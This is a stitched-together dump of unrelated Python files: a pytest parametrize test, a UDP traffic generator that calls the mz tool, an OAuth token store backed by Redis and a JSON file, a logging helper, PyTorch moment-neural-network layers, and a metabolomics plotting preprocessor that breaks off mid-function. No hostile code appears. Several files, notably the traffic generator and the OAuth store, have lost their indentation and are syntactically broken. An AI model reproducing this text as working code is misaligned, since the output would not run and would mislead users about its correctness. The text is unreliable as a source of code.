@pytest.mark.parametrize('a, b, expect', data_1, ids=ids)
class TestParametrize(object):
    def test_parametrize_1(self, a, b, expect):
        print('测试函数1测试数据为{}-{}'.format(a, b))
        assert a + b == expect
    def test_parametrize_2(self, a, b, expect):
        print('测试函数2数据为{}-{}'.format(a, b))
        assert a + b == expect
|
"""
Probability based traffic generator
"""
import os
import threading
import sched
import time
import sys
import random
import subprocess
DESTINATION = str(sys.argv[1])
PACKET_SIZE = int(sys.argv[2])
PROBABILITY = float(sys.argv[3])
RATE_IF_TRANS = int(sys.argv[4])
scheduler = sched.scheduler(time.time, time.sleep)
udp_packet_header_size = 42
packet_size = PACKET_SIZE - udp_packet_header_size
packet_count = int(RATE_IF_TRANS/(8*PACKET_SIZE))
delay = int(1/packet_count * 10**6)
delay_cmd = ""
if delay > 1:
delay_cmd = f"-d {delay}"
command = f"mz -A 11.0.0.1 -B {DESTINATION} -T udp -c {packet_count} -p {packet_size}"
def one_second_traffic():
if random.choices([True,False],[PROBABILITY,1-PROBABILITY])[0]:
print(f"packet size {PACKET_SIZE}")
print(f"rate {RATE_IF_TRANS}")
print(f"packet count {packet_count}")
print(command)
os.system(command)
def generate_tick():
scheduler.enter(1,1,generate_tick)
t = threading.Thread(target=one_second_traffic)
t.start()
generate_tick()
scheduler.run()
|
#!/usr/bin/env python
from oauth_client.config import settings
from redis import StrictRedis, ConnectionError
import json
import logging
from datetime import datetime
from filelock import Timeout, FileLock
class OAuthTokenStore:
"""
Generic method to save and retrieve values from file and redis backed token storage
"""
def __init__(self, ):
self._redis = StrictRedis.from_url(settings.MESSAGE_QUEUE.URL, charset="utf-8", decode_responses=True)
self._token_file = settings.OAUTH.TOKEN_CACHE
self._token_prepend = settings.OAUTH.TOKEN_KEY_PREPEND
self._access_code_prepend = f'{self._token_prepend}_accesscode'
self._token_refresh_prepend = f'{self._token_prepend}_refreshtoken'
self._token_access_prepend = f'{self._token_prepend}_accesstoken'
self._last = None # this is a bail out help if you happen to read auth code before you were ready to use it
try:
self._redis.ping()
except ConnectionError as e:
self._error = e
logging.warning(f'Redis connection error, please resolve, this module requires redis: {e.args}')
def _get_token_cache_data(self, client_id):
if self._get_client_id(client_id=client_id) is None:
return None
else:
return self._get_client_id(client_id=client_id).popitem()
def _modify_token_cache_data(self, client_id, data:dict):
data.update({'client_id': client_id,
'last_mod_time': int(datetime.utcnow().timestamp())
}) # forcing these two fields
lock = FileLock(f'{self._token_file}.lock')
with open(self._token_file, 'r') as f:
existing_data = json.load(f)
try:
lock.acquire(timeout=2)
if self._get_client_id(client_id=client_id) is None:
# looks to be a net new client id, appending it
with open(self._token_file, 'w+') as f:
num_keys = len(existing_data.keys())
existing_data[num_keys + 1] = data
f.seek(0)
json.dump(existing_data, f)
else:
cache_id, client_dict = self._get_client_id(client_id=client_id).popitem()
existing_data[cache_id].update(**data)
with open(self._token_file, 'w+') as f:
f.seek(0)
json.dump(existing_data, f)
existing_data[cache_id].update(**data)
except TimeoutError as e:
raise(e)
finally:
lock.release()
@classmethod
def default_qs_params(klass, endpoint_type:str):
if endpoint_type.lower()[0:4] == 'auth':
qs_dict = {
'response_type': 'code',
'client_id': '{client_id}',
'redirect_uri': '{redirect_url}',
'scope': None,
'state': '{state}'
}
elif endpoint_type.lower()[0:4] == 'acce':
qs_dict = {
'grant_type': 'authorization_code',
'client_id': '{client_id}',
'code': '{access_code}',
'redirect_uri': '{redirect_url}',
'scope': None,
'access_type': None
}
elif endpoint_type.lower()[0:4] == 'refr':
qs_dict = {
'grant_type': 'refresh_token',
'client_id': '{client_id}',
'refresh_token': '{refresh_token}',
'scope': None,
}
else:
raise ValueError("Unexpected argument 1:{endpoint_type}, require one of ('authorization', 'access' or 'refresh')")
return qs_dict
def add_oauth_client(self, client_id:str, auth_endpoint:str, token_endpoint:str, service_name:str=None, redirect_url=settings.OAUTH.REDIRECT_URL):
"""
This is setting up the client_id for an oauth call. I want this to be extensible so I'm adding
the ability to provide a service_name for segmenting.
Note, no data pushed to redis here, this is all local file cache stuff
TODO: the endpoint args here are a bit semantic sensitive, add data checks upfront or make it simpler
"""
assert self._token_file is not None, "No local token file storage set, this is required"
data = {
'client_id': client_id,
'auth_endpoint': {**auth_endpoint},
'token_endpoint': {**token_endpoint},
'redirect_url': redirect_url,
'service_name': service_name,
'add_time': int(datetime.utcnow().timestamp()),
'auth_code_set': False,
'refresh_token_ttl': None,
'acess_token_ttl': None,
}
self._modify_token_cache_data(client_id, data)
return self._get_client_id(client_id)
def is_auth_code_set(self, client_id):
if self._get_client_id(client_id) is not None:
cache_id, client_dict = self._get_client_id(client_id).popitem()
try:
return client_dict['auth_code_set']
except:
return "DATA FORMAT ISSUE - no auth_code_set in token cache"
else:
return None
def client_token_info(self, client_id):
if self._get_client_id(client_id) is not None:
cache_id, client_dict = self._get_client_id(client_id).popitem()
try:
client_dict.update({'refresh_token_ttl': self._redis.ttl(f'{self._token_refresh_prepend}:_{client_id}'),
'acess_token_ttl': self._redis.ttl(f'{self._token_access_prepend}:_{client_id}')})
except ConnectionError as e:
client_dict.update({'refresh_token_ttl': 'NO MESSAGE BROKER CONN',
'acess_token_ttl': 'NO MESSAGE BROKER CONN'})
return client_dict
else:
return None
def get_qs_params(self, client_id):
if self._get_client_id(client_id=client_id) is not None:
cache_id, client_data = self._get_token_cache_data(client_id)
try:
return client_data['qs_params']
except:
return None
def get_access_code(self, client_id):
if self._get_client_id(client_id=client_id) is not None:
val = self._redis.get(f'{self._access_code_prepend}:_{client_id}')
self._last = val
self._redis.delete(f'{self._access_code_prepend}:_{client_id}')
self._modify_token_cache_data(client_id, {'auth_code_set': False})
return val
else:
logging.info(f"No client id found that matches requested: {client_id}")
return None
def set_access_code(self, client_id, access_code):
if self._get_client_id(client_id=client_id) is not None:
self._redis.set(f'{self._access_code_prepend}:_{client_id}', access_code, ex=None)
self._modify_token_cache_data(client_id, {'auth_code_set': True})
return True
else:
logging.info(f"No client id found that matches requested: {client_id}")
return False
def get_refresh_token(self, client_id):
if self._get_client_id(client_id=client_id) is not None:
return self._redis.get(f'{self._token_refresh_prepend}:_{client_id}')
else:
logging.info(f"No client id found that matches requested: {client_id}")
return None
def set_refresh_token(self, client_id, token, ttl:int):
if self._get_client_id(client_id=client_id) is not None:
self._redis.set(f'{self._token_refresh_prepend}:_{client_id}', token, ex=ttl)
return 1
else:
logging.info(f"No client id found that matches requested: {client_id}")
return None
def get_access_token(self, client_id):
if self._get_client_id(client_id=client_id) is not None:
return self._redis.get(f'{self._token_access_prepend}:_{client_id}')
else:
logging.info(f"No client id found that matches requested: {client_id}")
return None
def set_access_token(self, client_id, token, ttl:int):
if self._get_client_id(client_id=client_id) is not None:
self._redis.set(f'{self._token_access_prepend}:_{client_id}', token, ttl)
return 1
else:
logging.info(f"No client id found that matches requested: {client_id}")
return None
def redis_key_name(self, key_type:str, client_id:str):
if key_type == "access_code":
return f'{self._access_code_prepend}:_{client_id}'
elif key_type == "token_refresh":
return f'{self._token_refresh_prepend}:_{client_id}'
elif key_type == "token_access":
return f'{self._token_access_prepend}:_{client_id}'
else:
raise ValueError(f'Unknown key_type "{key_type}", expected ["access_code", "token_refresh", "token_access"]')
@property
def _list_clients(self, ):
try:
with open(self._token_file, 'r') as f:
data = json.load(f)
except FileNotFoundError as e:
data = {}
finally:
return data
@classmethod
def list_service_names(klass, ):
my_obj = klass()
client_info = my_obj._list_clients
service_name_list = [ ]
for k, v in client_info.items():
if v['service_name'] not in service_name_list:
service_name_list.append(v['service_name'])
return service_name_list
def _get_client_id(self, client_id, ):
try:
with open(self._token_file, 'r') as f:
data = json.load(f)
return_data = None
for key, val in data.items():
if val['client_id'] == client_id:
return_data = {key: val}
break
except FileNotFoundError as e:
import os
with open(self._token_file, 'a+') as f:
json.dump({}, f)
os.chmod(self._token_file, 0o600)
return_data = None
finally:
return return_data
def _clear_file_cache(self, ):
try:
import os
with open(self._token_file, 'w+') as f:
json.dump({}, f)
os.chmod(self._token_file, 0o600)
finally:
return None
|
import logging
import os
import sys
from collections import defaultdict
# Configure Logger
# Module-level logger, initialised lazily by configure(); every helper in
# this module no-ops while it is still None.
Log = None
# Buffered log lines keyed by cache id, plus the first-seen ordering used
# for FIFO flushing in writeNextCacheToLog().
Cache = defaultdict(lambda: list())
CacheOrder = list()
def log(msg, level='debug'):
    """Write msg to the module logger, mapping symbolic level names."""
    if Log is None:
        return
    if level == 'debug':
        Log.debug(msg)
    elif level == 'info':
        Log.info(msg)
    elif level == 'moreinfo':
        # custom verbosity level between DEBUG (10) and INFO (20)
        Log.log(15, msg)
    else:
        # any other value is treated as a numeric logging level
        Log.log(level, msg)
def logStartPrep(lapFrac):
    """Log a banner marking the start of target selection for a lap."""
    banner = '=' * 50 + ' lap %.2f Target Selection' % (lapFrac)
    log(banner, 'moreinfo')
def logStartMove(lapFrac, moveID, nMoves):
    """Log a banner marking the start of move moveID out of nMoves."""
    banner = '=' * 50 + ' lap %.2f %d/%d' % (lapFrac, moveID, nMoves)
    log(banner, 'moreinfo')
def logPhase(title):
    """Log a phase title, right-aligned with a dotted leader to 50 chars."""
    log('.' * (50 - len(title)) + ' %s' % (title), 'debug')
def logPosVector(vec, fmt='%8.1f', Nmax=10, label='', level='debug'):
    """Log up to Nmax entries of vec formatted with fmt, optionally labeled."""
    if Log is None:
        return
    rendered = ' '.join(fmt % (x) for x in vec[:Nmax])
    if label:
        log(rendered + " | " + label, level)
    else:
        log(rendered, level)
def logProbVector(vec, fmt='%8.4f', Nmax=10, level='debug'):
    """Log up to Nmax entries of a probability vector formatted with fmt."""
    if Log is None:
        return
    rendered = ' '.join(fmt % (x) for x in vec[:Nmax])
    log(rendered, level)
# Advanced caching
###########################################################
def addToCache(cID, msg):
    # Buffer msg under cID, recording first-seen order for FIFO flushing.
    # The membership test must precede the append: Cache is a defaultdict,
    # and Cache[cID] below creates the entry on first access.
    if cID not in Cache:
        CacheOrder.append(cID)
    Cache[cID].append(msg)
def writeNextCacheToLog():
    """Flush the oldest buffered cache entry to the log (FIFO order)."""
    oldest = CacheOrder.pop(0)
    for entry in Cache[oldest]:
        log(entry)
def writePlanToLog(Plan):
    """Write every buffered line of a Plan's 'log' list to the logger."""
    for entry in Plan['log']:
        log(entry)
# Configuration
###########################################################
def configure(taskoutpath, doSaveToDisk=0, doWriteStdOut=0):
    """Initialise the module-level 'birthmove' logger.

    Handler setup depends on the flags: plain-text transcripts under
    taskoutpath when doSaveToDisk is truthy, stdout echo when doWriteStdOut
    is truthy, otherwise only a NullHandler.
    """
    global Log
    Log = logging.getLogger('birthmove')
    Log.setLevel(logging.DEBUG)
    Log.handlers = []  # remove pre-existing handlers!
    formatter = logging.Formatter('%(message)s')
    # Config logger to save transcript of log messages to plain-text file
    if doSaveToDisk:
        # birth-vtranscript.txt logs everything
        fh = logging.FileHandler(
            os.path.join(
                taskoutpath,
                "birth-vtranscript.txt"))
        fh.setLevel(logging.DEBUG)
        fh.setFormatter(formatter)
        Log.addHandler(fh)
        # birth-transcript.txt logs high-level messages
        # (level DEBUG+1 filters out plain DEBUG records)
        fh = logging.FileHandler(
            os.path.join(
                taskoutpath,
                "birth-transcript.txt"))
        fh.setLevel(logging.DEBUG + 1)
        fh.setFormatter(formatter)
        Log.addHandler(fh)
    # Config logger that can write to stdout
    if doWriteStdOut:
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(logging.INFO)
        ch.setFormatter(formatter)
        Log.addHandler(ch)
    # Config null logger, avoids error messages about no handler existing
    if not doSaveToDisk and not doWriteStdOut:
        Log.addHandler(logging.NullHandler())
|
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 3 14:49:43 2020
@author: zzc14
"""
import torch
from Mnn_Core.mnn_utils import *
from torch import Tensor
from torch.nn.parameter import Parameter
import torch.nn.functional as F
from torch.nn import init
from Mnn_Core.fast_dawson import *
# Default all tensors to float64 for numerical stability of the moment maps.
torch.set_default_tensor_type(torch.DoubleTensor)
# Shared instance of the project's core moment-activation routines.
mnn_core_func = Mnn_Core_Func()
class Mnn_Linear_without_Corr(torch.nn.Module):
    """Moment-propagating linear layer mapping (mean, std) -> (mean, std),
    ignoring cross-neuron correlations."""
    __constants__ = ['in_features', 'out_features']
    in_features: int
    out_features: int
    weight: Tensor
    def __init__(self, in_features: int, out_features: int, bias: bool = False) -> None:
        super(Mnn_Linear_without_Corr, self).__init__()
        self.in_features = in_features
        self.out_features = out_features
        self.weight = Parameter(torch.Tensor(out_features, in_features))
        if bias:
            self.bias = Parameter(torch.Tensor(out_features))
        else:
            # keeps self.bias defined (as None) when no bias is requested
            self.register_parameter('bias', None)
        self.reset_parameters()
    def reset_parameters(self) -> None:
        # NOTE(review): a=sqrt(15) differs from the sqrt(5) used by
        # Mnn_Linear_Corr and torch.nn.Linear -- confirm this is intentional.
        init.kaiming_uniform_(self.weight, a=np.sqrt(15))
        if self.bias is not None:
            fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)
            bound = 1 / np.sqrt(fan_in)
            init.uniform_(self.bias, -bound, bound)
    def forward(self, input1: Tensor, input2: Tensor):
        """Propagate the mean (input1) and std (input2) through the layer.

        The scaling by `ratio` comes from the project's Mnn_Core_Func;
        its semantics are not visible here.
        """
        ratio = mnn_core_func.get_ratio()
        # degree = mnn_core_func.get_degree()
        out1 = F.linear(input1, self.weight, self.bias)*(1 - ratio)
        # variances propagate through squared weights; sqrt restores std
        # NOTE(review): the un-squared bias is added into the variance term
        # by F.linear here -- confirm this matches the intended model.
        out2 = F.linear(torch.pow(input2, 2), torch.pow(self.weight, 2), self.bias)*(1+np.power(ratio, 2))
        out2 = torch.sqrt(out2)
        return out1, out2
    def extra_repr(self) -> str:
        return 'in_features={}, out_features={}, bias={}'.format(
            self.in_features, self.out_features, self.bias is not None
        )
class Mnn_Linear_Corr(torch.nn.Module):
    """Moment-propagating linear layer that also propagates the cross-neuron
    correlation matrix: (mean, std, corr) -> (mean, std, corr)."""
    __constants__ = ['in_features', 'out_features']
    in_features: int
    out_features: int
    weight: Tensor
    def __init__(self, in_features: int, out_features: int, bias: bool = False) -> None:
        super(Mnn_Linear_Corr, self).__init__()
        self.in_features = in_features
        self.out_features = out_features
        self.weight = Parameter(torch.Tensor(out_features, in_features))
        if bias:
            self.bias = Parameter(torch.Tensor(out_features))
        else:
            # keeps self.bias defined (as None) when no bias is requested
            self.register_parameter('bias', None)
        self.reset_parameters()
    def reset_parameters(self) -> None:
        # same initialisation scheme as torch.nn.Linear (a=sqrt(5))
        init.kaiming_uniform_(self.weight, a=np.sqrt(5))
        if self.bias is not None:
            fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)
            bound = 1 / np.sqrt(fan_in)
            init.uniform_(self.bias, -bound, bound)
    def forward(self, mean_in: Tensor, std_in, corr_in: Tensor):
        """Propagate (mean, std, corr); the covariance transforms as W C W^T."""
        # ratio not used for std and corr
        ratio = mnn_core_func.get_ratio()
        mean_out = F.linear(mean_in, self.weight, self.bias) * (1 - ratio)
        # Use corr_in and std to compute the covariance matrix
        if std_in.dim() == 1:
            # single sample: outer product of the std vector with itself
            temp_std_in = std_in.view(1, -1)
            temp_std_in = torch.mm(temp_std_in.transpose(1, 0), temp_std_in)
            cov_in = torch.mul(temp_std_in, corr_in)
        else:
            # batched: per-sample outer products via bmm
            temp_std_in = std_in.view(std_in.size()[0], 1, -1)
            temp_std_in = torch.bmm(temp_std_in.transpose(-2, -1), temp_std_in)
            # element-wise mul
            cov_in = torch.mul(temp_std_in, corr_in)
        # cov_out = W C W^T
        cov_out = torch.matmul(self.weight, torch.matmul(cov_in, self.weight.transpose(1, 0)))
        if self.bias is not None:
            # NOTE(review): adds the outer product of the bias vector to the
            # covariance -- confirm this matches the intended model.
            bias = self.bias.view(1, -1)
            bias = torch.mm(bias.transpose(1, 0), bias)
            cov_out += bias
        if cov_out.dim() == 2:  # one sample case
            var_out = torch.diagonal(cov_out)
            # prevent negative value
            std_out = torch.sqrt(torch.abs(var_out))
            temp_std_out = std_out.view(1, -1)
            temp_std_out = torch.mm(temp_std_out.transpose(1, 0), temp_std_out)
            # normalise the covariance back into a correlation matrix
            corr_out = torch.div(cov_out, temp_std_out)
        else:
            var_out = torch.diagonal(cov_out, dim1=-2, dim2=-1)
            std_out = torch.sqrt(torch.abs(var_out))
            temp_std_out = std_out.view(std_out.size()[0], 1, -1)
            temp_std_out = torch.bmm(temp_std_out.transpose(-2, -1), temp_std_out)
            # element-wise div
            corr_out = torch.div(cov_out, temp_std_out)
        return mean_out, std_out, corr_out
    def extra_repr(self) -> str:
        return 'in_features={}, out_features={}, bias={}'.format(
            self.in_features, self.out_features, self.bias is not None
        )
class Mnn_Activate_Mean(torch.autograd.Function):
    """Custom autograd op: moment activation for the mean channel.

    Forward and backward delegate to the numpy-based mnn_core_func: tensors
    are detached, flattened, processed, then reshaped back.
    """
    @staticmethod
    def forward(ctx, mean_in, std_in):
        clone_mean = mean_in.clone().detach().numpy()
        clone_std = std_in.clone().detach().numpy()
        shape = clone_mean.shape
        # Todo Should remove flatten op to save time
        clone_mean = clone_mean.flatten()
        clone_std = clone_std.flatten()
        mean_out = mnn_core_func.forward_fast_mean(clone_mean, clone_std)
        # Todo Should remove flatten op to save time
        mean_out = torch.from_numpy(mean_out.reshape(shape))
        # inputs and output are needed for the analytic backward pass
        ctx.save_for_backward(mean_in, std_in, mean_out)
        return mean_out
    @staticmethod
    def backward(ctx, grad_output):
        """Chain grad_output through the core's gradients w.r.t. mean and std."""
        mean_in, std_in, mean_out = ctx.saved_tensors
        clone_std_in = std_in.clone().detach().numpy()
        clone_mean_out = mean_out.clone().detach().numpy()
        clone_mean_in = mean_in.clone().detach().numpy()
        # Todo Should remove flatten op to save time
        shape = clone_std_in.shape
        clone_mean_in = clone_mean_in.flatten()
        clone_std_in = clone_std_in.flatten()
        clone_mean_out = clone_mean_out.flatten()
        grad_mean, grad_std = mnn_core_func.backward_fast_mean(clone_mean_in, clone_std_in, clone_mean_out)
        # Todo Should remove flatten op to save time
        grad_mean = torch.from_numpy(grad_mean.reshape(shape))
        grad_std = torch.from_numpy(grad_std.reshape(shape))
        # apply the chain rule with the incoming gradient
        grad_mean = torch.mul(grad_output, grad_mean)
        grad_std = torch.mul(grad_output, grad_std)
        return grad_mean, grad_std
class Mnn_Activate_Std(torch.autograd.Function):
    """Custom autograd op: moment activation for the std channel.

    Takes the already-activated mean (output of Mnn_Activate_Mean) as a
    third input; its gradient contribution is returned as zeros.
    """
    @staticmethod
    def forward(ctx, mean_in, std_in, mean_out):
        clone_mean = mean_in.clone().detach().numpy()
        clone_std = std_in.clone().detach().numpy()
        clone_mean_out = mean_out.clone().detach().numpy()
        shape = clone_mean.shape
        # Todo Should remove flatten op to save time
        clone_mean = clone_mean.flatten()
        clone_std = clone_std.flatten()
        clone_mean_out = clone_mean_out.flatten()
        std_out= mnn_core_func.forward_fast_std(clone_mean, clone_std, clone_mean_out)
        # Todo Should remove flatten op to save time
        std_out = torch.from_numpy(std_out.reshape(shape))
        # all four tensors are needed for the analytic backward pass
        ctx.save_for_backward(mean_in, std_in, mean_out, std_out)
        return std_out
    @staticmethod
    def backward(ctx, grad_output):
        """Chain grad_output through the core's std gradients; the mean_out
        input receives a zero gradient."""
        mean_in, std_in, mean_out, std_out = ctx.saved_tensors
        clone_mean_in = mean_in.clone().detach().numpy()
        clone_std_in = std_in.clone().detach().numpy()
        clone_mean_out = mean_out.clone().detach().numpy()
        clone_std_out = std_out.clone().detach().numpy()
        # Todo Should remove flatten op to save time
        shape = clone_std_in.shape
        clone_mean_in = clone_mean_in.flatten()
        clone_std_in = clone_std_in.flatten()
        clone_mean_out = clone_mean_out.flatten()
        clone_std_out = clone_std_out.flatten()
        std_grad_mean, std_grad_std = mnn_core_func.backward_fast_std(clone_mean_in, clone_std_in, clone_mean_out,
                                                                      clone_std_out)
        # Todo Should remove flatten op to save time
        std_grad_mean = torch.from_numpy(std_grad_mean.reshape(shape))
        std_grad_std = torch.from_numpy(std_grad_std.reshape(shape))
        # apply the chain rule with the incoming gradient
        std_grad_mean = torch.mul(grad_output, std_grad_mean)
        std_grad_std = torch.mul(grad_output, std_grad_std)
        # mean_out was passed as a detached auxiliary input -> zero gradient
        grad_mean_out = torch.zeros_like(std_grad_mean)
        return std_grad_mean, std_grad_std, grad_mean_out
class Mnn_Activate_Corr(torch.autograd.Function):
    """Custom autograd op: moment activation for the correlation channel."""
    @staticmethod
    def forward(ctx, corr_in, mean_in, std_in, mean_out, std_out):
        """
        corr_in: The covariance matrix that passed the Mnn_Linear_Cov layer
        mean_bn_in: the mean vector that passed the batch normalization layer
        std_bn_in: the std vector that passed the batch normalization layer
        The following variable should pass by using clone().detach() function (require no gradient)
        mean_out : the mean vector that is activated by Mnn_Activate_Mean
        std_out : the std vector that is activated by Mnn_Activate_Std
        """
        # Compute the chi function
        clone_mean_in = mean_in.clone().detach().numpy()
        clone_std_in = std_in.clone().detach().numpy()
        clone_mean_out = mean_out.clone().detach().numpy()
        clone_std_out = std_out.clone().detach().numpy()
        shape = clone_mean_in.shape
        clone_mean_in = clone_mean_in.flatten()
        clone_mean_out = clone_mean_out.flatten()
        clone_std_in = clone_std_in.flatten()
        clone_std_out = clone_std_out.flatten()
        func_chi = mnn_core_func.forward_fast_chi(clone_mean_in, clone_std_in, clone_mean_out, clone_std_out)
        # func_chi = np.nan_to_num(func_chi)
        func_chi = torch.from_numpy(func_chi.reshape(shape))
        # Compute the Cov of next layer
        # One sample case
        if func_chi.dim() == 1:
            # outer product chi chi^T scales the correlation element-wise
            temp_func_chi = func_chi.view(1, -1)
            temp_func_chi = torch.mm(temp_func_chi.transpose(1, 0), temp_func_chi)
        # Multi sample case
        else:
            temp_func_chi = func_chi.view(func_chi.size()[0], 1, func_chi.size()[1])
            temp_func_chi = torch.bmm(temp_func_chi.transpose(-1, -2), temp_func_chi)
        corr_out = torch.mul(corr_in, temp_func_chi)
        # replace the diagonal elements with 1
        if corr_out.dim() == 2:
            for i in range(corr_out.size()[0]):
                corr_out[i, i] = 1.
        else:
            for i in range(corr_out.size()[0]):
                for j in range(corr_out.size()[1]):
                    corr_out[i, j, j] = 1.0
        # chi (not corr_out) is what the backward pass needs
        ctx.save_for_backward(corr_in, mean_in, std_in, mean_out, func_chi)
        return corr_out
    # require the gradient of corr_in, mean_bn_in, std_bn_in
    @staticmethod
    def backward(ctx, grad_out):
        """Gradients for (corr_in, mean_in, std_in); the detached mean_out
        and std_out inputs receive zero gradients."""
        corr_in, mean_in, std_in, mean_out, func_chi = ctx.saved_tensors
        clone_mean_in = mean_in.clone().detach().numpy()
        clone_std_in = std_in.clone().detach().numpy()
        clone_mean_out = mean_out.clone().detach().numpy()
        clone_func_chi = func_chi.clone().detach().numpy()
        shape = clone_std_in.shape
        # Todo unnecessary flatten operation, need to be optimised
        clone_mean_in = clone_mean_in.flatten()
        clone_std_in = clone_std_in.flatten()
        clone_mean_out = clone_mean_out.flatten()
        clone_func_chi = clone_func_chi.flatten()
        chi_grad_mean, chi_grad_std = mnn_core_func.backward_fast_chi(clone_mean_in, clone_std_in,
                                                                      clone_mean_out, clone_func_chi)
        chi_grad_mean = torch.from_numpy(chi_grad_mean.reshape(shape))
        chi_grad_std = torch.from_numpy(chi_grad_std.reshape(shape))
        temp_corr_grad = torch.mul(grad_out, corr_in)
        if temp_corr_grad.dim() == 2:  # one sample case
            temp_corr_grad = torch.mm(func_chi.view(1, -1), temp_corr_grad)
        else:
            temp_corr_grad = torch.bmm(func_chi.view(func_chi.size()[0], 1, -1), temp_corr_grad)
        # reshape the size from (batch, 1, feature) to (batch, feature)
        # NOTE(review): in the one-sample (2-D) branch above this view keeps a
        # leading dim of 1, so the gradients broadcast as (1, n) -- confirm
        # the expected shapes for the single-sample path.
        temp_corr_grad = 2 * temp_corr_grad.view(temp_corr_grad.size()[0], -1)
        corr_grad_mean = chi_grad_mean * temp_corr_grad
        corr_grad_std = chi_grad_std * temp_corr_grad
        if func_chi.dim() == 1:
            temp_func_chi = func_chi.view(1, -1)
            chi_matrix = torch.mm(temp_func_chi.transpose(1, 0), temp_func_chi)
        else:
            temp_func_chi = func_chi.view(func_chi.size()[0], 1, -1)
            chi_matrix = torch.bmm(temp_func_chi.transpose(-2, -1), temp_func_chi)
        corr_grad_corr = 2 * torch.mul(chi_matrix, grad_out)
        # set the diagonal element of corr_grad_corr to 0
        if corr_grad_corr.dim() != 2:
            for i in range(corr_grad_corr.size()[0]):
                for j in range(corr_grad_corr.size()[1]):
                    corr_grad_corr[i, j, j] = 0.0
        else:
            for i in range(corr_grad_corr.size()[0]):
                corr_grad_corr[i, i] = 0.0
        # zero grads for the detached auxiliary inputs mean_out / std_out
        grad_mean_out = torch.zeros_like(mean_out)
        grad_std_out = torch.zeros_like(mean_out)
        return corr_grad_corr, corr_grad_mean, corr_grad_std, grad_mean_out, grad_std_out
if __name__ == "__main__":
neuron = 5
batch = 1
u = torch.rand(batch, neuron)
u.requires_grad = True
s = torch.abs(u.clone())
rho = torch.diag(torch.ones(neuron))
u1 = Mnn_Activate_Mean.apply(u, s)
s1 = Mnn_Activate_Std.apply(u, s, u1)
r1 = Mnn_Activate_Corr.apply(rho, u, s, u1, s1)
print(u1, s1, r1, sep="\n")
print(torch.var(u1))
|
# Import packages that are needed
import pandas as pd # tested with version 0.22.0
import matplotlib as mpl
import matplotlib.pyplot as plt # tested with version 2.1.2
import seaborn as sns # tested with version 0.8.1
import matplotlib.gridspec
from .summary_stats import get_merged
mpl.use("Agg")
ALPHA = 0.1 # nominally significant p-value threshold
WILCOXON_STAT = "Wilcoxon rank-sum stat" # Set up column names
WILCOXON_P_VALUE = "Wilcoxon rank-sum p-value"
# Set the color palette for the bar plot, where significant = red = C2 and Not significant = C0 = blue
PALETTE = {"Bonferoni": "C3", "Nominal": "C0"}
COMBO_FIG_SIZE = (15, 6) # (25, 10)
BARPLOT_FIG_SIZE = (8, 4.3) # (15, 8)
def _annotate_significance(significant, sample_type, cutoff):
    """Subset *significant* to one sample type, sort by the rank-sum
    statistic, and label each molecule "Bonferoni" or "Nominal".

    A .copy() is taken so the Significance column is written on an owned
    frame rather than a view of the caller's DataFrame.
    """
    subset = significant[significant["Sample Type"].str.match(sample_type)]
    subset = subset.sort_values(by=WILCOXON_STAT).copy()
    subset["Significance"] = "Nominal"
    subset.loc[subset[WILCOXON_P_VALUE] < cutoff, "Significance"] = "Bonferoni"
    return subset


def _drop_na_columns(df):
    """Return *df* without any column containing at least one NA value."""
    na_columns = [col for col in df.columns if df.loc[:, col].isna().sum() > 0]
    return df.drop(na_columns, axis=1)


def _index_by_sample_name(df, sample_names):
    """Return *df* with its row index relabeled positionally to *sample_names*
    (one name per row, in order)."""
    mapping = dict(zip(df.index.values.tolist(), sample_names))
    return df.rename(index=mapping)


def process_data(locations):
    """Load summary statistics and merged measurements and build plot inputs.

    Parameters
    ----------
    locations : dict
        Must provide locations["data"]["resource"]["format"] ("gct" or "csv")
        and locations["summary"]["path"] (CSV of summary statistics);
        the rest is consumed by get_merged().

    Returns
    -------
    dict with the significance tables for both measures and the three
    heatmap-ready DataFrames (all samples, measure1, measure2).

    Raises
    ------
    ValueError if the data format is neither "gct" nor "csv".
    """
    fmt = locations["data"]["resource"]["format"].lower()
    if fmt == "gct":
        measure1, measure2 = "before", "after"
    elif fmt == "csv":
        measure1, measure2 = "urine", "serum"
    else:
        # Previously this fell through silently and later raised a confusing
        # NameError on measure1/measure2; fail fast with a clear message.
        raise ValueError("Unsupported data format: {}".format(fmt))

    summaryStats = pd.read_csv(locations["summary"]["path"], sep=",")

    # Rows whose rank-sum p-value is nominally significant (p < ALPHA).
    summaryStats_significant = summaryStats.iloc[
        summaryStats[WILCOXON_P_VALUE]
        .where(summaryStats[WILCOXON_P_VALUE] < ALPHA)
        .dropna()
        .index
    ]

    # Bonferroni cutoff is computed over ALL tested molecules, not just the
    # nominally significant subset.
    bonferroni_cutoff = 0.05 / len(summaryStats.index)
    summaryStats_significant_measure1 = _annotate_significance(
        summaryStats_significant, measure1, bonferroni_cutoff
    )
    summaryStats_significant_measure2 = _annotate_significance(
        summaryStats_significant, measure2, bonferroni_cutoff
    )

    merged, droppable, case, control = get_merged(locations)

    # All-sample heatmap: drop NA-containing metabolites, drop metadata
    # columns that are present, then label rows by sample name.
    merged_naRemoved = _drop_na_columns(merged)
    csvdropColumns = droppable + [
        "Sample Name",
        "Extraction Protocol",
        "Extraction Method",
        "Spectrum Protocol",
        "Status",
        "Sample Type",
    ]
    dropColumns = [c for c in csvdropColumns if c in merged_naRemoved.columns.values]
    merged_naRemoved = merged_naRemoved.drop(dropColumns, axis=1)
    merged_naRemoved = _index_by_sample_name(
        merged_naRemoved, merged["Sample Name"].values.tolist()
    )

    # Per-measure heatmaps: keep only the significant molecules for that
    # measure, drop NA-containing ones, and label rows by sample name.
    measure1_df = merged[merged["Sample Type"] == measure1]
    measure1_significant = _drop_na_columns(
        measure1_df[summaryStats_significant_measure1["Molecule"]]
    )
    measure1_significant = _index_by_sample_name(
        measure1_significant, measure1_df["Sample Name"].values.tolist()
    )

    measure2_df = merged[merged["Sample Type"] == measure2]
    measure2_significant = _drop_na_columns(
        measure2_df[summaryStats_significant_measure2["Molecule"]]
    )
    measure2_significant = _index_by_sample_name(
        measure2_significant, measure2_df["Sample Name"].values.tolist()
    )

    return {
        "summ_stats_measure1": summaryStats_significant_measure1,
        "summ_stats_measure2": summaryStats_significant_measure2,
        "heatmap_all_samples": merged_naRemoved,
        "heatmap_measure1_significant": measure1_significant,
        "heatmap_measure2_significant": measure2_significant,
    }
def create_bar_plots(
    x,
    y,
    title,
    figsize=BARPLOT_FIG_SIZE,
